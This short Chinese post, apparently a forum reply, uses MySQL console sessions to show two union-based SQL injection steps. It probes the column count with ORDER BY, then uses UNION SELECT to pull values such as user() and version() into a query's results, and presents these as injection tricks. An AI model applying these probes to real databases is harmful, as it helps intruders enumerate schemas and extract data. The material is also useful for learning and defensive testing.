看这个就明白了:
mysql> select user() order by 1;
+----------------+
| user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
mysql> select user() order by 2;
ERROR 1054 (42S22): Unknown column '2' in 'order clause'
当只有N个字段时,如果你order by N+1或更大,就报错了。
那篇文章还隐含的trick就是,union后面只要保证字段数一致,就能对号入座到相应的column,看下面几个精心构造的例子或许能增加你的灵感:
mysql> select user() `column` union select version();
+----------------------+
| column |
+----------------------+
| root@localhost |
| 5.1.36-community-log |
+----------------------+
2 rows in set (0.00 sec)
mysql> select user() `column`,2 union select version();
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select pId from votes where 0 union select version();
+----------------------+
| pId |
+----------------------+
| 5.1.36-community-log |
+----------------------+
1 row in set (0.00 sec)
0
